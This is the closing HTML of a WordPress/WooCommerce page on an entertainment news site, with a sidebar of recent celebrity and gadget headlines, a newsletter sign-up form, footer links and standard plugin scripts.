</div><!-- #comments -->
		<ul class="default-wp-page clearfix">
			<li class="previous"><a href="https://dvdclubonline.com/sylvia-confirms-shes-leaving-today/" rel="prev"><span class="meta-nav">&larr;</span> Sylvia confirms she’s leaving Today</a></li>
			<li class="next"></li>
		</ul>
					</div> <!-- Primary end -->
				
<aside id="secondary" class="widget-area" role="complementary">
	
	<style>
.rpwe-block ul{list-style:none!important;margin-left:0!important;padding-left:0!important;}.rpwe-block li{border-bottom:1px solid #eee;margin-bottom:10px;padding-bottom:10px;list-style-type: none;}.rpwe-block a{display:inline!important;text-decoration:none;}.rpwe-block h3{background:none!important;clear:none;margin-bottom:0!important;margin-top:0!important;font-weight:400;font-size:12px!important;line-height:1.5em;}.rpwe-thumb{border:1px solid #EEE!important;box-shadow:none!important;margin:2px 10px 2px 0;padding:3px!important;}.rpwe-summary{font-size:12px;}.rpwe-time{color:#bbb;font-size:11px;}.rpwe-comment{color:#bbb;font-size:11px;padding-left:5px;}.rpwe-alignleft{display:inline;float:left;}.rpwe-alignright{display:inline;float:right;}.rpwe-aligncenter{display:block;margin-left: auto;margin-right: auto;}.rpwe-clearfix:before,.rpwe-clearfix:after{content:"";display:table !important;}.rpwe-clearfix:after{clear:both;}.rpwe-clearfix{zoom:1;}
</style>
	<section id="rpwe_widget-3" class="widget rpwe_widget recent-posts-extended"><h3 class="widget-title"><span>Latest News</span></h3><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/sylvia-confirms-shes-leaving-today/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/bb898f8a53fe1fb3c0c4412bf7eb577b-65x65.jpg" alt="Sylvia confirms she’s leaving Today"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/sylvia-confirms-shes-leaving-today/" title="Permalink to Sylvia confirms she’s leaving Today" rel="bookmark">Sylvia confirms she’s leaving Today</a></h3><time class="rpwe-time published" datetime="2020-02-01T20:21:02+00:00">1 week ago</time><div class="rpwe-summary">Sylvia Jeffreys has confirmed she won’t be part of the &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/otter-mickey-mount-gives-your-home-mini-a-mouse-house/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/img-6628-65x65.jpg" alt="Otter Mickey Mount gives your Home Mini a mouse house"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/otter-mickey-mount-gives-your-home-mini-a-mouse-house/" title="Permalink to Otter Mickey Mount gives your Home Mini a mouse house" rel="bookmark">Otter Mickey Mount gives your Home Mini a mouse house</a></h3><time class="rpwe-time published" datetime="2020-01-18T11:36:06+00:00">3 weeks ago</time><div class="rpwe-summary">I&#8217;m calling this thing the Mickey Mount, but you&#8217;ll find &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/the-best-presidents-day-sales-and-deals/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/fightcamp-65x65.jpg" alt="The best President&#8217;s Day sales and deals"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/the-best-presidents-day-sales-and-deals/" title="Permalink to The best President&#8217;s Day sales and deals" rel="bookmark">The best President&#8217;s Day sales and deals</a></h3><time class="rpwe-time published" datetime="2020-01-10T07:35:35+00:00">1 month ago</time><div class="rpwe-summary">  Happy early third-Monday-in-February, everyone! That&#8217;s otherwise known as President&#8217;s &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/brad-pitt-to-star-in-world-war-z-sequel-with-david-fincher-directing/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/wwzbradpitt-65x65.jpg" alt="Brad Pitt to star in World War Z sequel, with David Fincher directing"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/brad-pitt-to-star-in-world-war-z-sequel-with-david-fincher-directing/" title="Permalink to Brad Pitt to star in World War Z sequel, with David Fincher directing" rel="bookmark">Brad Pitt to star in World War Z sequel, with David Fincher directing</a></h3><time class="rpwe-time published" datetime="2020-01-06T06:20:36+00:00">1 month ago</time><div class="rpwe-summary">World War Z is breaking out again. A sequel to &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/every-secret-youve-ever-had-is-about-to-be-exposed/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/d834a0b229135c9a696eeaa1954f8697-65x65.jpg" alt="‘Every secret you’ve ever had is about to be exposed’"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/every-secret-youve-ever-had-is-about-to-be-exposed/" title="Permalink to ‘Every secret you’ve ever had is about to be exposed’" rel="bookmark">‘Every secret you’ve ever had is about to be exposed’</a></h3><time class="rpwe-time published" datetime="2019-12-28T04:37:33+00:00">2 months ago</time><div class="rpwe-summary">Married At First Sight stars might achieve overnight fame after &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/the-blocks-guest-bedroom-reveals-get-savage/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/29e5a2656203861ba22b78c5a3215e3a-65x65.jpg" alt="The Block’s guest bedroom reveals get savage"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/the-blocks-guest-bedroom-reveals-get-savage/" title="Permalink to The Block’s guest bedroom reveals get savage" rel="bookmark">The Block’s guest bedroom reveals get savage</a></h3><time class="rpwe-time published" datetime="2019-12-08T21:47:55+00:00">2 months ago</time><div class="rpwe-summary">THE latest room reveal on The Block sees judges Shaynna &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/untold-truth-of-beverly-hills-90210/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/bd35caa7816e00a95b4349abc7a07c9e-65x65.jpg" alt="Untold truth of Beverly Hills, 90210"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/untold-truth-of-beverly-hills-90210/" title="Permalink to Untold truth of Beverly Hills, 90210" rel="bookmark">Untold truth of Beverly Hills, 90210</a></h3><time class="rpwe-time published" datetime="2019-12-05T19:12:53+00:00">2 months ago</time><div class="rpwe-summary">  As a self-described “skinny kid from Ohio”, Luke Perry &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/at-sundances-new-frontier-vr-and-ar-go-epic-weird-and-theatrical/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/travelingwhileblack-65x65.jpg" alt="At Sundance&#8217;s New Frontier, VR and AR go epic, weird and theatrical"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/at-sundances-new-frontier-vr-and-ar-go-epic-weird-and-theatrical/" title="Permalink to At Sundance&#8217;s New Frontier, VR and AR go epic, weird and theatrical" rel="bookmark">At Sundance&#8217;s New Frontier, VR and AR go epic, weird and theatrical</a></h3><time class="rpwe-time published" datetime="2019-12-01T10:02:58+00:00">2 months ago</time><div class="rpwe-summary">This year&#8217;s New Frontier program at Sundance is getting back &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/ces-2019-node-ify-is-the-super-sensing-smart-puck-for-your-home/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/20190106-184623-65x65.jpg" alt="CES 2019: Node-ify is the super-sensing smart puck for your home"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/ces-2019-node-ify-is-the-super-sensing-smart-puck-for-your-home/" title="Permalink to CES 2019: Node-ify is the super-sensing smart puck for your home" rel="bookmark">CES 2019: Node-ify is the super-sensing smart puck for your home</a></h3><time class="rpwe-time published" datetime="2019-11-25T14:25:56+00:00">3 months ago</time><div class="rpwe-summary">Startup Node-ify is at CES 2019 with a smart-home device &hellip;</div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://dvdclubonline.com/william-shatner-lets-get-carrie-fisher-a-hollywood-star/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://dvdclubonline.com/wp-content/uploads/2020/02/kirkleia-65x65.jpg" alt="William Shatner: Let&#8217;s get Carrie Fisher a Hollywood star"></a><h3 class="rpwe-title"><a href="https://dvdclubonline.com/william-shatner-lets-get-carrie-fisher-a-hollywood-star/" title="Permalink to William Shatner: Let&#8217;s get Carrie Fisher a Hollywood star" rel="bookmark">William Shatner: Let&#8217;s get Carrie Fisher a Hollywood star</a></h3><time class="rpwe-time published" datetime="2019-11-22T11:59:13+00:00">3 months ago</time><div class="rpwe-summary">The Star Trek and Star Wars universes are colliding.  On &hellip;</div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></section>
	</aside><!-- #secondary -->
			</div>
		</main>
	</div>


	  <footer id="colophon">
		 <div id="top-footer" class="clearfix">
	<div class="tg-container">
		<div class="tg-inner-wrap">
			<div class="top-content-wrapper">
            	<div class="tg-column-wrapper">
									<div class="tg-column-2 footer-block">

					<section id="mc4wp_form_widget-3" class="widget widget_mc4wp_form_widget"><h3 class="widget-title"><span>Stay Informed</span></h3><script>(function() {
	window.mc4wp = window.mc4wp || {
		listeners: [],
		forms: {
			on: function(evt, cb) {
				window.mc4wp.listeners.push(
					{
						event   : evt,
						callback: cb
					}
				);
			}
		}
	}
})();
</script><!-- Mailchimp for WordPress v4.7.5 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-313" method="post" data-id="313" data-name="Sign Up" ><div class="mc4wp-form-fields"><p>
	<label>Email address: 
		<input type="email" name="EMAIL" placeholder="Your email address" required />
</label>
</p>

<p>
	<input type="submit" value="Sign up" />
</p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1581435914" /><input type="hidden" name="_mc4wp_form_id" value="313" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></section>					</div>

									<div class="tg-column-2 footer-block">

					<section id="nav_menu-3" class="widget widget_nav_menu"><h3 class="widget-title"><span>More Informartion</span></h3><div class="menu-legal-menu-container"><ul id="menu-legal-menu" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-10" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a href="/dmca">DMCA</a></li>
<li id="menu-item-16" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
<li id="menu-item-18" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18"><a href="/returns">Returns</a></li>
<li id="menu-item-21" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21"><a href="/shipping-and-delivery">Shipping and delivery</a></li>
</ul></div></section>					</div>

							</div>
		</div>
	</div>
	</div>
</div>
		 <div id="bottom-footer" class="clearfix">
			<div class="tg-container">
				<div class="copy-right">
					Theme: eStore by <a href="https://themegrill.com" rel="author">ThemeGrill</a>.					<span class="sep"> | </span>
					Proudly powered by <a href="https://wordpress.org/">WordPress</a>.				</div>
							</div>
		</div>
	  </footer>
	  <a href="#" class="scrollup"><i class="fa fa-angle-up"> </i> </a>
   </div> <!-- Page end -->
   <script>(function() {function maybePrefixUrlField() {
	if (this.value.trim() !== '' && this.value.indexOf('http') !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if (urlFields) {
	for (var j=0; j < urlFields.length; j++) {
		urlFields[j].addEventListener('blur', maybePrefixUrlField);
	}
}
})();</script>	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/dvdclubonline.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.9.1'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.9.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_812d7b4beee5df5f52e954b0e9b3e590","fragment_name":"wc_fragments_812d7b4beee5df5f52e954b0e9b3e590","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.9.1'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/themes/estore/js/jquery.bxslider.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/themes/estore/js/superfish.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-includes/js/comment-reply.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/themes/estore/js/skip-link-focus-fix.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/themes/estore/js/custom.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms.min.js?ver=4.7.5'></script>

		<!-- Cookie Notice plugin v1.2.50 by Digital Factory https://dfactory.eu/ -->
		<div id="cookie-notice" role="banner" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: #000;"><div class="cookie-notice-container" style="color: #fff;"><span id="cn-notice-text" class="cn-text-container">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Accept</a><a href="#" id="cn-refuse-cookie" data-cookie-set="refuse" class="cn-set-cookie cn-button bootstrap button">Refuse</a><a href="https://dvdclubonline.com/cookie-privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Privacy policy</a></span></div>
			<div class="cookie-revoke-container" style="color: #fff;"><span id="cn-revoke-text" class="cn-text-container">You can revoke your consent any time using the Revoke consent button.</span><span id="cn-revoke-buttons" class="cn-buttons-container"><a href="#" class="cn-revoke-cookie cn-button bootstrap button">Revoke consent</a></span>
			</div>
		</div>
		<!-- / Cookie Notice plugin --></body>
</html>

